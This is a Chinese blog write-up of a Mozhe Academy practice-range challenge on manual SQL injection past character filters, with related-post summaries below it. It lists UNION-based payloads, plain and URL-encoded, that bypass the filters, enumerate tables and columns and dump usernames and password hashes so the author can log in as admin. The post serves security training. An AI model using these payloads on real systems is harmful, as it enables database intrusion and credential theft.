墨者学院—SQL过滤字符后手工注入漏洞测试

已于 2022-03-16 20:11:02 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: 墨者学院 文章标签: web安全 安全 sql 数据库
于 2022-03-16 20:08:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20737293/article/details/123533847
版权

靶场地址:

SQL过滤字符后手工注入漏洞测试(第1题)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。

今天来学习墨者学院中的字符过滤靶场

我们打开靶场

 

 

我们进到靶场看到一个登录页面

看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来..

 

然后仔细看到下方有个导航条我我们点进去

注意看这个URL,我就怀疑注入点在这里,然后打开工具尝试注入

但是我发现无论输入什么数据,他都跳回到主页面。那就可以猜测页面是过滤了字符的,那我们就想想能把什么字符进行转义

空格可以用/**/来转义

=号可以用URL编码(或者Like)

那我们就可以构造判断是否存在注入的语句

/**/and/**/1=1

然后进行URL编码,变成

/%2a%2a/%61%6e%64/%2a%2a/%31=%31

我们进行尝试闭合语句,在尝试多次后判断是数字型注入,无需闭合,那我们开始判断注入

我们可以很显然的看到,在1=1的条件成立的时候页面有回显,但是在1=2的时候页面不进行回显,那么我们可以判断页面是有注入的。那我们先查看列数,构造

/**/order/**/by/**/1

/%2a%2a/%6f%72%64%65%72/%2a%2a/%62%79/%2a%2a/%31

可以看到order by为5的时候页面没有了回显,说明页面只有4列数据

然后判断页面回显位置

/**/union/**/select/**/1,2,3,4

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%32%2c%33%2c%34

可以看到页面在字段2、3的地方有了回显,接下来可以判断数据库

/**/union/**/select/**/1,database(),3,4

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%64%61%74%61%62%61%73%65%28%29%2c%33%2c%34

获取表:

/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema=database()

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%2c%33%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%73%63%68%65%6d%61=%64%61%74%61%62%61%73%65%28%29

获取列:

/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name='notice'

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%6e%61%6d%65=%27%6e%6f%74%69%63%65%27

/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name='stormgroup_member'

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%6e%61%6d%65=%27%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72%27

很明显第二个表的列名比较符合我们所需,我们查看第二个表的name和password字段

/**/union/**/select/**/1,group_concat(name),group_concat(password),4/**/from/**/stormgroup_member

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%6e%61%6d%65%29%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%70%61%73%73%77%6f%72%64%29%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72

 我们就把账号密码求出来了,但是密码是加密后的,我们去解密一下

三个密码就被我们解密出来了。我们拿账号登录一下。

登录mozhe的账号显示

登录admin的账号即获取flag(还得是admin)

以后可能靶场更新频率做不到一天一更..

Chips.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者靶场 初级:SQL过滤字符手工注入漏洞测试
qq_43233085的博客
01-13 408
墨者靶场 初级:SQL过滤字符手工注入漏洞测试题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+MySQL,PHP代码对客户端提交的参数做了些许过滤。来感受过滤过后的SQL手工注入吧。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解字符串的URL加解密; 4、了解SQL注入...
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2223
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
刷题笔记:SQL过滤字符手工注入漏洞测试(第1题)
m0_67399862的博客
05-26 527
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
墨者SQL过滤字符手工注入漏洞测试(第1题)
wswr的博客
03-12 1942
思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤 那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替 简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了 ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶 总结
墨者学院(POST注入
2301_77578012的博客
05-19 421
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
墨者学院----SQL过滤字符手工注入漏洞测试(第1题)
qq_43590351的博客
01-22 424
SQL过滤字符手工注入漏洞测试(第1题) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面 保持正常,有可能我们输入的字符过滤 过滤的"="号可以利用like代替,空格用==/**/==代替 判断字段数 /**/order/**/by/**/4 介绍一个在线的url编码解码网站 http://web.chacuo.net/charseturlencode 由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%7
墨者 - SQL过滤字符手工注入漏洞测试(第1题)
吃肉唐僧的博客
07-04 1322
一开始使用order by,union select ,and 字段,发现返回并没有变化。 推测这些字段是已经过滤掉了 后来,上网查询后发现 ,不但这些字段过滤,还有空格和‘=’也被过滤掉了 所以‘=’可以用Like 替代,空格用/**/,url 要编码转义 在这里有个坑,花了我不少时间 一般url都是用在线url解码,例如:https://tool.chinaz.com/tool...
墨者-SQL过滤字符手工注入漏洞测试(第1题)题解
zr1213159840的博客
12-10 834
这题和以前的简单题目一样,看题目的提示以及自己的测试知道过滤了=,–+,空格符号。等于可以使用like进行替代,空格可以使用/**/进行替代。最主要的,感觉题目给了误解,没有说准确,题目说url加密,但是经过测试直接选在网上选择url加密的链接并不行,最后测试是url网址16进制加密才可以,链接如下 url16进制加密 下面开始正式步骤: 首先是测试是否存在注入,将id=1改成id=2,没得显示,可能存在漏洞。 然后我们再测试下id=1 and 1=1和and 1=2行不行,需要注意的是,需要对空格以及=进
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
2. Setter方法注入:通过setter方法设置依赖的对象,可以在实例化后任何时候进行注入。 3. 接口注入:提供一个接口,由容器调用该接口的方法来注入依赖。 基于XML的配置则是将对象及其依赖关系写入XML配置文件,如`...
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
墨者SQL过滤字符手工注入漏洞测试(第3题)
wswr的博客
03-18 932
思路:首先试一下单引号先,发现报错,这里发现报错就能用报错注入的方式解决,具体操作看别的(用这种方法我是成功了),然后按照普通注入的正常玩法的话,发现注入点,判断这应该是字符型,然后试着闭合,发现也可以,欸,那就是正常注入了 总结:先判断注入点,注入类型,然后正常一套操作,order by不行就再试试select,(实在不行报错注入的方法也能做),然后就算遇到特殊字符的库名表名要注意用编码,还有反单引号的应用 ps:关于反单引号的知识点【原本是拿来防止把正常的字符当成保留字符,即 别把表名为sele
SQL过滤字符手工注入漏洞测试(第1题)
weixin_47493074的博客
10-03 183
SQL过滤字符手工注入漏洞测试(第1题)
墨者靶场-SQL过滤字符手工注入漏洞测试(第1题)
shy的博客
11-15 288
墨者学习 By/shy014 进去首页又看到熟悉的公告 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没...
墨者学院 - SQL过滤字符手工注入漏洞测试(第1题)
多崎巡礼的博客
09-28 2677
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
墨者学院 SQL过滤字符手工注入漏洞测试(第3题)
a519395243的博客
12-21 1441
 手工注入 墨者学院 SQL过滤字符手工注入漏洞测试(第3题) 使用sqlmap 跑,跑不出表名,所以手工注入 点击进去靶场 域名url为:   http://219.153.49.228:41774/new_list.php?id=1   第一步:判断是否有注入点     http://219.153.49.228:41774/new_list.php?id=1'    出...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值